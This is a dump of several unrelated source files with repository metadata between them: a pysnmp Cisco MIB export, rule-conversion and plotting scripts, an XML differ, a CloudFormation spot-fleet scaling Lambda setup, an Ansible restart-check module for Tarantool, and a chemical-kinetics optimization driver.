mibBuilder.exportSymbols("CISCO-WAN-FR-CONN-MIB", ciscoWanFrConnMIBGroups=ciscoWanFrConnMIBGroups, frCDRNumber=frCDRNumber, frChanStateGrpEntry=frChanStateGrpEntry, frChanStatsEnable=frChanStatsEnable, chanServType=chanServType, frConnRemotePCR=frConnRemotePCR, chanDEtoCLPmap=chanDEtoCLPmap, frLocalNSAP=frLocalNSAP, stateChanNum=stateChanNum, frConnSCR=frConnSCR, chanServiceRate=chanServiceRate, frstdABRNrm=frstdABRNrm, ciscoWanFrConnCompliance=ciscoWanFrConnCompliance, qir=qir, ciscoWanFrConnQueueGroup=ciscoWanFrConnQueueGroup, frChanCnfGrpEntry=frChanCnfGrpEntry, frChanLocalLpbkEnable=frChanLocalLpbkEnable, frstdABRCDF=frstdABRCDF, frChanCnfGrp=frChanCnfGrp, ciscoWanFrConnStateGroup=ciscoWanFrConnStateGroup, frstdABRRDF=frstdABRRDF, be=be, xmtATMState=xmtATMState, frRoutingPriority=frRoutingPriority, frstdABRTrm=frstdABRTrm, chanEgrPercentUtil=chanEgrPercentUtil, foreSightEnable=foreSightEnable, chanPortNum=chanPortNum, chanFECNconfig=chanFECNconfig, frConnRemotePercentUtil=frConnRemotePercentUtil, chanServiceRateOverride=chanServiceRateOverride, PYSNMP_MODULE_ID=ciscoWanFrConnMIB, frEndPtMapGrp=frEndPtMapGrp, frstdABRMCR=frstdABRMCR, frstdABRTBE=frstdABRTBE, ciscoWanFrConnTestGroup=ciscoWanFrConnTestGroup, frstdABRcnfChanNum=frstdABRcnfChanNum, bc=bc, egressQDepth=egressQDepth, frEndPtMapGrpTable=frEndPtMapGrpTable, frRemoteVci=frRemoteVci, chanTestType=chanTestType, frstdABRRIF=frstdABRRIF, frMaxCost=frMaxCost, chanEgrSrvRate=chanEgrSrvRate, frChanCnfGrpTable=frChanCnfGrpTable, frConnPercentUtil=frConnPercentUtil, ciscoWanFrConnEndptGroup=ciscoWanFrConnEndptGroup, ciscoWanFrConnMIBCompliances=ciscoWanFrConnMIBCompliances, frConnTemplateId=frConnTemplateId, ingressQDEThresh=ingressQDEThresh, ciscoWanFrConnABRGroup=ciscoWanFrConnABRGroup, mir=mir, xmtAbitState=xmtAbitState, frRemoteVpi=frRemoteVpi, ingressQDepth=ingressQDepth, frChanUpcEnable=frChanUpcEnable, chanFrConnType=chanFrConnType, chanRowStatus=chanRowStatus, egressQDEThresh=egressQDEThresh, egressQSelect=egressQSelect, chanNum=chanNum, rcvAbitState=rcvAbitState, ibs=ibs, endDLCI=endDLCI, ciscoWanFrConnMIB=ciscoWanFrConnMIB, frstdABRCnfGrpEntry=frstdABRCnfGrpEntry, frChanDirectRoute=frChanDirectRoute, frChanSlaveType=frChanSlaveType, frRestrictTrunkType=frRestrictTrunkType, frConnServiceType=frConnServiceType, frstdABRPCR=frstdABRPCR, frstdABRADTF=frstdABRADTF, frEndPtMapGrpEntry=frEndPtMapGrpEntry, chanType=chanType, frMastership=frMastership, frLocalVpi=frLocalVpi, frConnRemoteSCR=frConnRemoteSCR, pir=pir, frConnAdminStatus=frConnAdminStatus, frConnRemoteMBS=frConnRemoteMBS, frChanOamCCEnable=frChanOamCCEnable, chanReroute=chanReroute, chanNumNextAvailable=chanNumNextAvailable, chanTestState=chanTestState, frChanCnfChangeCount=frChanCnfChangeCount, frLocalVci=frLocalVci, frChanPrefRouteId=frChanPrefRouteId, frstdABRICR=frstdABRICR, frstdABRFRTT=frstdABRFRTT, chanLocRmtLpbkState=chanLocRmtLpbkState, ciscoWanFrConnForesightGroup=ciscoWanFrConnForesightGroup, ciscoWanFrConnMIBConformance=ciscoWanFrConnMIBConformance, dLCI=dLCI, frConnRemoteMCR=frConnRemoteMCR, chanState=chanState, frVpcFlag=frVpcFlag, chanRTDResult=chanRTDResult, frConnMCR=frConnMCR, cir=cir, frConnForeSightEnable=frConnForeSightEnable, rcvATMState=rcvATMState, chanStatusBitMap=chanStatusBitMap, frConnFGCRAEnable=frConnFGCRAEnable, frRemoteNSAP=frRemoteNSAP, zeroCirConEir=zeroCirConEir, frChanStateGrpTable=frChanStateGrpTable, egressQECNThresh=egressQECNThresh, chanOvrSubOvrRide=chanOvrSubOvrRide, deTaggingEnable=deTaggingEnable, chanCLPtoDEmap=chanCLPtoDEmap, 
chanIngrPercentUtil=chanIngrPercentUtil, frConnPCR=frConnPCR, frChanCnfIgnoreIncomingDE=frChanCnfIgnoreIncomingDE, endChanNum=endChanNum, endLineNum=endLineNum, ingressQECNThresh=ingressQECNThresh, frChanStateGrp=frChanStateGrp, endPortNum=endPortNum, ciscoWanFrConnGroup=ciscoWanFrConnGroup, frstdABRCnfGrpTable=frstdABRCnfGrpTable)
| 224.971354 | 3,885 | 0.765676 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp-with-texts/CISCO-WAN-FR-CONN-MIB.py | 86,389 | Python |
from typing import List
from pyarc.data_structures.car import ClassAssocationRule
from pyarc.data_structures.antecedent import Antecedent as CARAntecedent
from pyarc.data_structures.consequent import Consequent as CARConsequent
from mdrsl.data_structures.rules.generalized_rule_part import GeneralizedAntecedent
from mdrsl.data_structures.rules.rule_part import Consequent as MCARConsequent
from mdrsl.data_structures.rules.multi_target_class_association_rule import MCAR
from mdrsl.data_structures.item import EQLiteral
def convert_single_target_car_to_multi_target_car(single_target_car: ClassAssocationRule) -> MCAR:
st_antecedent: CARAntecedent = single_target_car.antecedent
st_consequent: CARConsequent = single_target_car.consequent
mcar_antecedent_literals: List[EQLiteral] = []
for literal in st_antecedent:
attribute, value = literal
mcar_antecedent_literals.append(EQLiteral(attribute=attribute, value=value))
mcar_antecedent = GeneralizedAntecedent(mcar_antecedent_literals)
mcar_consequent: MCARConsequent = MCARConsequent(
[EQLiteral(attribute=st_consequent.attribute, value=st_consequent.value)])
return MCAR(antecedent=mcar_antecedent, consequent=mcar_consequent,
support=single_target_car.support,
confidence=single_target_car.confidence)
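# Minimal usage sketch: convert a batch of single-target CARs into multi-target
# MCARs. `st_cars` is a hypothetical list of pyarc ClassAssocationRule objects
# (e.g. mined elsewhere); only the function defined above is assumed.
def convert_single_target_cars_to_multi_target_cars(st_cars: List[ClassAssocationRule]) -> List[MCAR]:
    return [convert_single_target_car_to_multi_target_car(car) for car in st_cars]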
| 44.933333 | 98 | 0.818991 | [
"Apache-2.0"
] | joschout/Multi-Directional-Rule-Set-Learning | mdrsl/rule_generation/association_rule_mining/convert_single_target_car_to_multi_target_car.py | 1,348 | Python |
import numpy as np
from plots import plots_for_predictions as pp
import sys
sys.path.append('/Users/lls/Documents/mlhalos_code/')
from mlhalos import distinct_colours as dc
import matplotlib.pyplot as plt
from pickle import load
c = dc.get_distinct(6)
path = '/Users/lls/Documents/deep_halos_files/mass_range_13.4/random_20sims_200k/lr5e-5/'
p1 = np.load(path + "seed_20/all_predicted_sim_6_epoch_09.npy")
t1 = np.load(path + "seed_20/all_true_sim_6_epoch_09.npy")
g = np.load(path + "seed_20/gamma.npy")[9]
path2 = '/Users/lls/Documents/deep_halos_files/mass_range_13.4/random_20sims_200k/averaged_boxes/log_alpha_-4/'
with open(path2 + 'scaler_output.pkl', 'rb') as pkl_file:
    scaler_training_set = load(pkl_file)
slices = [-0.85, -0.6, 0, 0.5, 0.75, 0.95]
f, a = pp.plot_likelihood_distribution(p1, t1, g, scaler_training_set, bins=None, fig=None, axes=None, color=c[4],
title=None, legend=True, slices=slices) | 44.190476 | 114 | 0.737069 | [
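# Render the resulting figure (assumes an interactive matplotlib backend; use
# f.savefig(<path>) instead to write it to disk).
plt.show()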
"MIT"
] | lluciesmith/DeepHalos | paper_plots/plot_likelihood.py | 928 | Python |
from __future__ import absolute_import
from .implementations import ChildDiffingMixing, ImplementationBase
from .differ import make_differ
import xml.dom.minidom as dom
import re
class DiffXMLDocument(ChildDiffingMixing, ImplementationBase):
diffs_types = dom.Document
def path_and_child(self, doc):
yield "?xml@version", doc.version
yield "?xml@encoding", doc.encoding
yield "?xml@standalone", doc.standalone
for i, child in enumerate(doc.childNodes):
if hasattr(child, 'tagName'):
yield "/%d<%s>" % (i, child.tagName), child
else:
yield "/%d:text" % i, child.data
class DiffXMLElement(ChildDiffingMixing, ImplementationBase):
diffs_types = dom.Element
def path_and_child(self, el):
yield ":tag", el.tagName
for name, value in el.attributes.items():
yield "@%s" % name, value
for i, child in enumerate(el.childNodes):
if hasattr(child, 'tagName'):
yield "/%d<%s>" % (i, child.tagName), child
else:
yield "/%d:text" % i, child.data
def diff_xml(expected, actual, *args, **kw):
xmls = map(dom.parseString, (expected,actual))
return make_differ(
DiffXMLDocument,
DiffXMLElement
)(*(tuple(xmls) + args), **kw) | 25.695652 | 67 | 0.705584 | [
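
# Minimal usage sketch (hypothetical documents; the shape of the returned diff
# object depends on make_differ in .differ, so it is simply printed here):
if __name__ == "__main__":
    expected = '<?xml version="1.0"?><root a="1"><item>x</item></root>'
    actual = '<?xml version="1.0"?><root a="2"><item>y</item></root>'
    print(diff_xml(expected, actual))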
"BSD-2-Clause"
] | clarabstract/treecompare | treecompare/xml.py | 1,182 | Python |
"""
Adds troposphere methods for adding scaling to a cluster
"""
from troposphere.awslambda import Function, Code, Environment, Permission
from troposphere import Ref, Sub, GetAtt
from troposphere.iam import Role, Policy
from troposphere.events import Target, Rule
from troposphere.ssm import Parameter
from ecs_cluster_deployer.utils import sanitize_cfn_resource_name
def add_scaling(spot_fleet, template, cluster_name):
""" Add scaling resources to a cluster """
ssm_param = Parameter(
'Scale{}'.format(sanitize_cfn_resource_name(spot_fleet.get('name'))),
Type="String",
Value="0",
Name=Sub("/ecs-maestro/${ClusterName}/${Version}/scaletime")
)
template.add_resource(ssm_param)
function_name = sanitize_cfn_resource_name(cluster_name)
autoscaling_role = Role(
"AutoscalingRole",
AssumeRolePolicyDocument={
"Statement": [{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {"Service": "lambda.amazonaws.com"},
}]
},
Policies=[
Policy(
PolicyName="ec2-spot-fleet-scaler",
PolicyDocument={
"Statement": [{
"Effect": "Allow",
"Action": [
"cloudwatch:Get*",
"ec2:DescribeSpotFleetRequests",
"ec2:ModifySpotFleetRequest",
"logs:*",
"ecs:ListContainerInstances",
"ecs:Update*",
"ecs:ListTasks",
"s3:GetEncryptionConfiguration"
],
"Resource": "*"
}, {
"Effect": "Allow",
"Action": [
"ssm:Get*",
"ssm:Put*",
"ssm:Delete*"
],
"Resource": [
{"Fn::Sub": "arn:aws:ssm:${AWS::Region}:${AWS::AccountId}:parameter/ecs-maestro/${ClusterName}/*"}
]
}]
}
),
Policy(
PolicyName="DeleteStack",
PolicyDocument={
"Statement": [{
"Effect": "Allow",
"Action": [
"lambda:InvokeFunction",
],
"Resource": [
{"Fn::Sub": "arn:aws:lambda:${AWS::Region}:${AWS::AccountId}:function:"+function_name+"ASGCleanupLambda"}]
}]
}
)
]
)
template.add_resource(autoscaling_role)
scaling_lambda = Function(
'ScalingLambda{}'.format(sanitize_cfn_resource_name(spot_fleet.get('name'))),
Code=Code(
S3Bucket=Sub("${S3Bucket}"),
S3Key=Sub("${S3Prefix}/deployment.zip")
),
Handler="scaling.scale_spot.lambda_handler",
Role=GetAtt(autoscaling_role, "Arn"),
Environment=Environment(
Variables={
"CLUSTER_NAME": Sub("${ClusterName}"),
"SPOT_FLEET": Ref(
"SpotFleet{}".format(
sanitize_cfn_resource_name(
spot_fleet.get('name')
)
)
),
"STATUS": Sub("${Status}"),
"VERSION": Sub("${Version}"),
"SCALE_IN_THRESHOLD": Sub("${SpotTaskThresholdIn}"),
"SCALE_OUT_THRESHOLD": Sub("${SpotTaskThresholdOut}"),
"MAX_WEIGHT": Sub("${SpotMaxWeight}"),
"MIN_WEIGHT": Sub("${SpotMinWeight}")
}
),
Timeout=900,
MemorySize=128,
Runtime="python3.7",
)
template.add_resource(scaling_lambda)
CronScaling = Rule(
"CronScaling{}".format(
sanitize_cfn_resource_name(spot_fleet.get('name'))
),
ScheduleExpression="rate(1 minute)",
Description="Cron for cluster stats",
Targets=[
Target(
Id="1",
Arn=GetAtt(scaling_lambda, "Arn"))
]
)
template.add_resource(CronScaling)
ScalingPerm = Permission(
"ScalePerm{}".format(
sanitize_cfn_resource_name(spot_fleet.get('name'))
),
Action="lambda:InvokeFunction",
FunctionName=GetAtt(scaling_lambda, "Arn"),
Principal="events.amazonaws.com",
SourceArn=GetAtt(CronScaling, "Arn")
)
template.add_resource(ScalingPerm)
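
if __name__ == "__main__":
    # Minimal sketch: build a standalone template holding only the scaling
    # resources for a hypothetical fleet named "primary". In the real deployer the
    # matching SpotFleet resource and the Sub() parameters (S3Bucket, ClusterName,
    # Version, ...) are added by the other compute/template modules.
    from troposphere import Template
    template = Template()
    add_scaling({'name': 'primary'}, template, 'my-cluster')
    print(template.to_json())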
| 36.961538 | 134 | 0.475338 | [
"MIT"
] | apollusehs-devops/ecs-cluster-deployer | ecs_cluster_deployer/compute/lambda_scaler.py | 4,805 | Python |
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.helpers import ModuleRes, CartridgeException, cartridge_errcodes
from ansible.module_utils.helpers import get_control_console
from ansible.module_utils.helpers import dynamic_box_cfg_params
import os
argument_spec = {
'restarted': {'required': False, 'type': 'bool'},
'control_sock': {'required': True, 'type': 'str'},
'appname': {'required': True, 'type': 'str'},
'instance_conf_file': {'required': True, 'type': 'str'},
'conf_section_name': {'required': True, 'type': 'str'},
'cluster_cookie': {'required': True, 'type': 'str'},
'cartridge_defaults': {'required': True, 'type': 'dict'},
'config': {'required': True, 'type': 'dict'},
'stateboard': {'required': True, 'type': 'bool'}
}
def read_yaml_file_section(filepath, control_console, section):
sections = control_console.eval('''
local file = require('fio').open('{}')
if file == nil then
error('Failed to open instance config file')
end
local buf = {{}}
while true do
local val = file:read(1024)
if val == nil then
error('Failed to read from instance config file')
elseif val == '' then
break
end
table.insert(buf, val)
end
file:close()
local data = table.concat(buf, '')
local ok, ret = pcall(require('yaml').decode, data)
if not ok then
error('Failed to decode instance config from YAML')
end
return ret
'''.format(filepath))
if section not in sections:
errmsg = 'File {} does not contain section: {}'.format(filepath, section)
raise CartridgeException(cartridge_errcodes.MISSED_SECTION, errmsg)
return sections[section]
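# e.g. read_yaml_file_section('/etc/tarantool/conf.d/myapp.yml', console, 'myapp')
# returns the dict stored under the 'myapp' key of that YAML file, or raises
# MISSED_SECTION if the key is absent (paths here are illustrative).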
def check_conf_updated(new_conf, old_conf, ignore_keys=[]):
# check new conf keys
for key, value in new_conf.items():
if key not in ignore_keys:
if key not in old_conf or old_conf[key] != value:
return True
# check old conf keys
for key, value in old_conf.items():
if key not in ignore_keys:
if key not in new_conf or new_conf[key] != value:
return True
return False
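# Illustrative examples (plain dict configs):
#   check_conf_updated({'log_level': 6}, {'log_level': 5})            -> True  (value changed)
#   check_conf_updated({'log_level': 6}, {})                          -> True  (new key)
#   check_conf_updated({'memtx_memory': 512}, {'memtx_memory': 256},
#                      ignore_keys=['memtx_memory'])                  -> False (ignored key)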
def get_current_cfg(control_console):
return control_console.eval('''
return type(box.cfg) ~= 'function' and box.cfg or box.NULL
''')
def needs_restart(params):
restarted = params['restarted']
if restarted is True:
return ModuleRes(success=True, changed=True)
if restarted is False:
return ModuleRes(success=True, changed=False)
stateboard = params['stateboard']
control_sock = params['control_sock']
appname = params['appname']
new_default_conf = params['cartridge_defaults']
new_instance_conf = params['config']
cluster_cookie = params['cluster_cookie']
instance_conf_file = params['instance_conf_file']
conf_section_name = params['conf_section_name']
default_conf_path = '/etc/tarantool/conf.d/{}.yml'.format(appname)
app_code_path = '/usr/share/tarantool/{}'.format(appname)
# check if instance was not started yet
if not os.path.exists(control_sock):
return ModuleRes(success=True, changed=True)
try:
control_console = get_control_console(control_sock)
except CartridgeException as e:
allowed_errcodes = [
cartridge_errcodes.SOCKET_NOT_FOUND,
cartridge_errcodes.FAILED_TO_CONNECT_TO_SOCKET,
cartridge_errcodes.INSTANCE_IS_NOT_STARTED_YET
]
        if e.code in allowed_errcodes:
            return ModuleRes(success=True, changed=True)
        # Re-raise unexpected errors so main() reports them via fail_json;
        # otherwise control_console would be unbound below.
        raise e
last_restart_time = os.path.getmtime(control_sock)
# check if application code was updated
package_update_time = os.path.getmtime(app_code_path)
if last_restart_time < package_update_time:
return ModuleRes(success=True, changed=True)
# check if instance config was changed (except memtx_memory)
current_instance_conf = read_yaml_file_section(
instance_conf_file,
control_console,
conf_section_name
)
if check_conf_updated(new_instance_conf, current_instance_conf, dynamic_box_cfg_params):
return ModuleRes(success=True, changed=True)
if not stateboard:
# check if default config was changed (except memtx_memory)
current_default_conf = read_yaml_file_section(
default_conf_path,
control_console,
appname
)
new_default_conf.update({'cluster_cookie': cluster_cookie})
if check_conf_updated(new_default_conf, current_default_conf, dynamic_box_cfg_params):
return ModuleRes(success=True, changed=True)
current_cfg = get_current_cfg(control_console)
for param_name in dynamic_box_cfg_params:
new_value = None
if param_name in new_instance_conf:
new_value = new_instance_conf[param_name]
elif not stateboard and param_name in new_default_conf:
new_value = new_default_conf[param_name]
# This code is ran after attempt to change parameter in runtime
# If current parameter wasn't changed to the new value,
# it mean that instance should be restarted to apply change
if new_value is not None:
if current_cfg[param_name] != new_value:
return ModuleRes(success=True, changed=True)
return ModuleRes(success=True, changed=False)
def main():
module = AnsibleModule(argument_spec=argument_spec)
try:
res = needs_restart(module.params)
except CartridgeException as e:
module.fail_json(msg=str(e))
if res.success is True:
module.exit_json(changed=res.changed, meta=res.meta)
else:
module.fail_json(msg=res.msg)
if __name__ == '__main__':
main()
| 33.508475 | 94 | 0.662452 | [
"BSD-2-Clause"
] | armohamm/ansible-cartridge | library/cartridge_needs_restart.py | 5,931 | Python |
import sys, os
sys.path.append('../../') #get rid of this at some point with central test script or when package is built
os.chdir('../../')
import MSI.simulations.instruments.shock_tube as st
import MSI.cti_core.cti_processor as pr
import MSI.optimization.matrix_loader as ml
import MSI.optimization.opt_runner as opt
import MSI.simulations.absorbance.curve_superimpose as csp
import MSI.simulations.yaml_parser as yp
import MSI.optimization.shock_tube_optimization_shell_six_param_fit as stMSIspf
import cantera as ct
import pandas as pd
import numpy as np
import MSI.utilities.plotting_script as plotter
import MSI.utilities.post_processor as post_processor
files_to_include = [['Pirraglia_0.yaml']]
numer_of_iterations = 3
cti_file = 'glarborg_custom.cti'
working_directory = 'MSI/data/H_O2'
reaction_uncertainty_csv = 'glarborg_reaction_uncertainty.csv'
master_reaction_equation_cti_name = 'master_reactions_glarborg.cti'
#rate_constant_target_value_data = 'burke_target_value_single_reactions.csv'
#this would be an empty string '' if you do not want to include it
run_with_k_target_values = 'On'
master_equation_reactions = ['H2O2 + OH <=> H2O + HO2',
'2 HO2 <=> H2O2 + O2',
'HO2 + OH <=> H2O + O2',
'2 OH <=> H2O + O',
'CH3 + HO2 <=> CH4 + O2',
'CH3 + HO2 <=> CH3O + OH']
#master_index = [2,3,4,5,6,7]
master_index = [2,3,4,5,6,7]
master_equation_uncertainty_df = pd.read_csv('MSI/data/H_O2/six_parameter_fit_large_uncertainty.csv')
#this could be 'On'
rate_constant_target_value_data_for_plotting = 'FFCM1_target_reactions_1_plotting.csv'
rate_constant_target_value_data = 'FFCM1_target_reactions_1.csv'
rate_constant_target_value_data_extra = 'FFCM1_target_reactions_extra_data.csv'
# Sensitivities of the six-parameter rate-fit coefficients (A, n, Ea, c, d, f) for each master-equation reaction
six_parameter_fit_sensitivities = {'H2O2 + OH <=> H2O + HO2':{'A':np.array([-13.37032086, 32.42060027, 19.23022032, 6.843287462 , 36.62853824 ,-0.220309785 ,-0.099366346, -4.134352081]),
'n':np.array([1.948532282, -5.341557065, -3.337497841, -1.025292166, -5.813524857, 0.011862923 ,0.061801326, 0.581628835]),
'Ea':np.array([-0.463042822, 1.529151218, 0.808025472 ,0.359889935, -0.021309254, -0.098013004, -0.102022118, -0.097024727]),
'c':np.array([0.00163576, -0.008645666, -0.003111179, -0.002541995, 0.014228149 ,0.001263134, 0.001236963, -0.000390567]),
'd':np.array([1.071992802, -2.780550365, -1.71391034 ,-0.274481751, -4.491132406, -0.054960894, 0.049553379, 0.270885383]),
'f':np.array([-0.027060156, 0.056903076, 0.041102936 ,0.001361221, 0.144385439, 0.003136796 ,0.001374015, -0.006089248])},
'2 HO2 <=> H2O2 + O2': {'A':np.array([-12.93733217, 24.39245077 ,17.73177606, 4.37803475, 33.44985889, 0.381601192 ,3.748890308]),
'n':np.array([1.872602872, -4.096806067, -3.09439453 ,-0.63226683, -5.125008418, -0.061610462, -0.677953862]),
'Ea':np.array([-0.463903763 ,1.259537237, 0.826684258 ,0.257400116, 0.803882706 ,2.20E-05, 0.181336266]),
'c':np.array([0.002069572, -0.008314769, -0.00424128 ,-0.002016113, 0.000134642 ,0.000122049 ,-0.001026567]),
'd':np.array([0.981856324, -1.847383095, -1.493544053, 0.016222685, -3.428753345, -0.050708107, -0.526284003]),
'f':np.array([-0.022628436, 0.023558844, 0.031573523 ,-0.00732987, 0.096573278 ,0.001668073, 0.01033547])},
'HO2 + OH <=> H2O + O2': {'A':np.array([-4.795727446, 6.426354909 ,4.878258417, 2.472791017, 7.856296474, 1.328033302 ,-3.457932692, -0.349839371, 2.331070924 ,2.403555921, -0.165397001, 0.246540172 ,0.722946077]),
'n':np.array([0.624241134, -1.321082842, -1.032242319, -0.36532386, -1.112545721, -0.188622956, 0.421083939 ,0.038859478 ,-0.360855106, -0.38989218, 0.029669899 ,-0.04371581, -0.130487515]),
'Ea':np.array([-0.259799111, 0.205620792 ,0.130799794, 0.137023666 ,0.379232542, 6.19E-02, -0.198196699, -0.023548432, 0.118069394 ,0.104383314 ,-0.003830947, 0.011566499 ,-0.073557828]),
'c':np.array([0.00161312, -0.001906694, -0.000863021, -0.00105112 ,-0.002185605, -0.000334461, 0.001817049 ,0.000170761, -0.000859313, -0.000653029, -3.11E-06 ,-6.37E-05, 0.00047058]),
'd':np.array([0.124499363, -0.645652135, -0.535188558, 0.052734001 ,-0.45181066, -0.082250635, 0.034779283, -0.011522821, 0.017057742, -0.165960963, 0.057288687, -0.012776017, -0.192422381]),
'f':np.array([0.002033109, -0.011099716, 0.005351213 ,-0.007623667, 0.005327017 ,0.001259485,0.00245957, 0.000976725 ,-0.004879845, 0.001903886 ,-0.001838669 ,0.000252269, 0.004691829])},
'2 OH <=> H2O + O': {'A': np.array([-5.40485067, 18.96061659 ,8.089301961, 6.953940096 ,-12.54280438, -3.264972401, 2.106487623 ,-1.657943467, 1.614935 ,-1.536463599]),
'n': np.array([0.803274875, -3.167851673, -1.607661056, -1.041258197, 1.679914849, 0.466415264 ,-0.326136934, 0.355297684 ,-0.16618967, 0.253903734]),
'Ea': np.array([0.147285831, 0.605814544, -0.062253282, 0.372322712, -1.884116555, -0.281992263, 0.099465537 ,0.030650483, 0.176069015 ,-0.056967886]),
'c': np.array([-0.003001658, -0.001870536, 0.003820535 ,-0.002753277, 0.014224162, 0.00032969 ,-0.000627241, -0.001081979, -0.002009835, 0.000255318]),
'd':np.array([0.446957978, -1.467039994, -1.298391635, -0.402720385, 0.568106728 ,0.229877892, -0.194395052, 1.033858025 ,0.527183366, 0.308743056]),
'f':np.array([-0.010053913, 0.025128322, 0.035579811 ,0.00515753 ,-0.0083511, -0.00512885, 0.003954, -0.029711993 ,-0.01986861, -0.007691647])},
'CH3 + HO2 <=> CH4 + O2': {'A':np.array([.007845,-.89278,-.94908]),
'n':np.array([-0.00104,-.36888,.154462]),
'Ea':np.array([.504278,-.44379,-0.03181]),
'c':np.array([0,0,0]),
'd':np.array([0,0,0]),
'f':np.array([0,0,0])},
'CH3 + HO2 <=> CH3O + OH': {'A':np.array([1.319108,-.92151]),
'n':np.array([-.04282,.150846]),
'Ea':np.array([0.024285,-0.02956]),
'c':np.array([0,0]),
'd':np.array([0,0]),
'f':np.array([0,0])}}
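    # Sensitivities of the Arrhenius parameters (A, n, Ea) with respect to the molecular
    # parameters of each master-equation reaction (assumed: one entry per perturbed parameter).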
molecular_parameter_sensitivities = {'H2O2 + OH <=> H2O + HO2':{'A':np.array([-0.373074255, -5.658058364,-2.203911028,1.69333527,-7.110529947,-0.272049596,1.373125254,-0.644666166]),
'n':np.array([0.043611058, 0.15417925, -0.208413633, -0.306031876, 0.81053055, 0.031772359 ,-0.136901806, 0.073807424]),
'Ea':np.array([0.419762882, -1.301125209, -0.681648059, -0.091866582, -2.353326781, -0.064230907, 0.047721593 ,0.147941186])},
'2 HO2 <=> H2O2 + O2': {'A':np.array([-0.166005487, -6.797175212, -2.798300682, 1.973896891 ,-4.354910767, -0.082067357, -3.839749825]),
'n':np.array([0.018748596, 0.294710827 ,-0.135488286, -0.332967052, 0.4930396, 0.009470627 ,0.409095255]),
'Ea':np.array([0.459015825, -1.401810899, -0.722040616, -0.066133729, -1.52807633 ,-0.021832631, -0.411667639])},
'HO2 + OH <=> H2O + O2': {'A':np.array([-1.30109642, -11.63457509, -4.680271526, 0.782373804 , -0.016083278, 0.005513255 ,-1.738426278, -0.232013539, 0.884067816 ,-0.500473791, 0.399272687 ,0.062255923 ,-1.667253993]),
'n':np.array([0.152797314, 1.1181845, 0.306250902 ,-0.164846884, -0.008229148, -0.001531881, 0.195875814 ,0.026844834, -0.18238354 ,0.017363927, -0.055634983 ,-0.017324495, 0.218771679]),
'Ea':np.array([0.101558432, -1.638858106, -0.704325409, -0.119041648, -0.307281167, -0.04872945, 0.001603412 ,0.000324159, -0.08089174, -0.148811902, 0.027266121 ,-0.002907638, -0.237949453])},
'2 OH <=> H2O + O': {'A': np.array([0.299144373, -2.662684629, -6.643003014, 0.370230493 ,-3.354253502, -0.271981922, -0.581195748, 9.774024441 , 5.90328859, 2.272800133]),
'n': np.array([-0.028599275, -0.071787028, 0.572722706 ,-0.109709456, 0.381272207 ,0.03153973 ,0.061282516, -1.341475144, -0.835422411, -0.302994441]),
'Ea': np.array([0.535103651, -1.054606857, -0.989721261, -0.169631331, -1.099840578, -0.069647609, -0.101285313, 0.74522721, 0.352517552 ,0.205464658])},
'CH3 + HO2 <=> CH4 + O2': {'A':np.array([.007845,-.89278,-.94908]),
'n':np.array([-0.00104,-.36888,.154462]),
'Ea':np.array([.504278,-.44379,-0.03181])},
'CH3 + HO2 <=> CH3O + OH': {'A':np.array([1.319108,-.92151]),
'n':np.array([-.04282,.150846]),
'Ea':np.array([0.024285,-0.02956])}}
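    # Nominal six-parameter-fit values (A, n, Ea, c, d, f) for each master-equation reaction.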
six_parameter_fit_nominal_parameters_dict = {'H2O2 + OH <=> H2O + HO2':{'A':4.64E-06,'n':5.605491008,'Ea':-5440.266692,'c':126875776.1,'d':0.000441194,'f':-5.35E-13},
'2 HO2 <=> H2O2 + O2':{'A':1.30E+04,'n':1.997152351,'Ea':-3628.04407,'c':93390973.44,'d':-0.000732521,'f':8.20E-12} ,
'HO2 + OH <=> H2O + O2':{'A':1.41E+18,'n':-2.05344973,'Ea':-232.0064051,'c':15243859.12,'d':-0.001187694,'f':8.01E-12},
'2 OH <=> H2O + O':{'A':354.5770856,'n':2.938741717,'Ea':-1836.492972,'c':12010735.18,'d':-4.87E-05,'f':1.22E-12},
'CH3 + HO2 <=> CH4 + O2':{'A':3.19e3,'n':2.670857,'Ea':-4080.73,'c':0.0,'d':0.0,'f':0.0},
'CH3 + HO2 <=> CH3O + OH':{'A':8.38e11,'n':.29,'Ea':-785.45,'c':0.0,'d':0.0,'f':0.0}}
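    # First optimization instance: a single run used to capture the nominal S matrix,
    # covariance, and experiment dictionaries before the iterative runs below.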
MSI_st_instance_one = stMSIspf.MSI_shocktube_optimization_six_parameter_fit(cti_file,
.01,
1,
1,
working_directory,
files_to_include,
reaction_uncertainty_csv,rate_constant_target_value_data,
master_equation_reactions = master_equation_reactions,
molecular_parameter_sensitivities = molecular_parameter_sensitivities,
six_parameter_fit_sensitivities = six_parameter_fit_sensitivities,
master_reaction_equation_cti_name = master_reaction_equation_cti_name,
master_index = master_index,
master_equation_uncertainty_df = master_equation_uncertainty_df,
six_paramter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict)
MSI_st_instance_one.one_run_shock_tube_optimization()
S_matrix_original = MSI_st_instance_one.S_matrix
exp_dict_list_original = MSI_st_instance_one.experiment_dictonaries
original_covariance = MSI_st_instance_one.covarience
X_one_itteration = MSI_st_instance_one.X
MSI_st_instance_one.deltaXAsNsEas
#need to fix this and return _s_matrix and y_matrix
MSI_st_instance_two = stMSIspf.MSI_shocktube_optimization_six_parameter_fit(cti_file,
.01,
1,
1,
working_directory,
files_to_include,
reaction_uncertainty_csv,rate_constant_target_value_data,
master_equation_reactions = master_equation_reactions,
molecular_parameter_sensitivities = molecular_parameter_sensitivities,
six_parameter_fit_sensitivities = six_parameter_fit_sensitivities,
master_reaction_equation_cti_name = master_reaction_equation_cti_name,
master_index = master_index,
master_equation_uncertainty_df = master_equation_uncertainty_df,
six_paramter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict)
#
#
#
#
#
#ALL OF THIS STUFF CAN PROBABLY GO INTO SOME SORT OF CLASS
delta_X_list = MSI_st_instance_two.multiple_shock_tube_runs(numer_of_iterations)
deltaXAsNsEas = MSI_st_instance_two.deltaXAsNsEas
physical_obervable_updates_list = MSI_st_instance_two.physical_obervable_updates_list
absorbance_observables_updates_list = MSI_st_instance_two.absorbance_coef_update_dict
Ydf = MSI_st_instance_two.Y_data_frame
Zdf = MSI_st_instance_two.z_data_frame
experimental_dicts = MSI_st_instance_two.experiment_dictonaries
z_matrix = MSI_st_instance_two.z_matrix
s_matrix = MSI_st_instance_two.s_matrix
y = MSI_st_instance_two.y_matrix
Y_matrix = MSI_st_instance_two.Y_matrix
